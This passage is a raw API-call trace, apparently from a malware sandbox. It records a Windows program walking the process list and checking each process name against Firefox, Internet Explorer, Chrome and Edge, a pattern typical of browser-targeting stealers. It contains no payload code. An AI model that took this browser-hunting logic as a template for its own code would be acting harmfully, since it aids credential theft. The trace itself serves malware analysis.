(lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0171.409] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0171.409] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0171.409] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0171.409] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.410] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.410] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.410] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.411] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.412] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0171.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0171.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0171.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0171.413] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.413] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.413] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.413] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.413] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.414] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.414] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.414] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.414] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.414] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0171.414] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0171.415] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0171.415] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0171.415] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0171.415] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0171.415] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0171.415] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0171.415] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.415] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0171.416] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0171.416] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0171.416] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0171.416] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.416] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.416] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.416] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.416] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0171.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0171.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0171.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0171.417] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0171.417] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0171.417] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0171.417] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0171.417] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0171.418] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0171.418] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0171.418] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0171.418] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0171.419] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0171.419] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0171.419] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0171.419] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0171.419] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0171.419] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0171.419] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0171.419] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0171.420] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0171.420] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0171.420] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0171.420] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0171.420] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0171.420] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0171.420] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0171.420] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.420] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0171.421] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0171.421] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0171.421] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0171.421] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.421] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0171.422] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0171.422] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0171.422] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0171.422] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0171.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0171.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0171.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0171.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.422] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0171.423] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0171.423] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0171.423] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0171.423] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.423] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0171.423] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0171.423] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0171.423] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0171.423] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.423] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0171.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0171.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0171.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0171.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.424] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0171.424] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0171.424] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0171.424] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0171.425] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0171.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0171.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0171.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0171.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.425] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0171.426] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0171.426] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0171.426] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0171.426] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0171.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0171.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0171.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0171.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.426] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0171.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0171.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0171.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0171.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0171.427] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0171.427] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0171.427] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0171.427] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.427] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0171.428] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0171.428] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0171.428] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0171.428] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.428] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0171.428] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0171.428] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0171.429] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0171.429] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0171.429] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0171.429] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0171.429] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0171.429] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.429] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.430] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0171.430] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0171.430] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0171.430] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.430] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.430] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.430] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.430] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0171.431] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0171.431] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0171.431] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0171.431] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.431] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.431] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.431] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.431] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.431] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.431] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0171.432] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0171.432] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0171.432] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0171.432] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 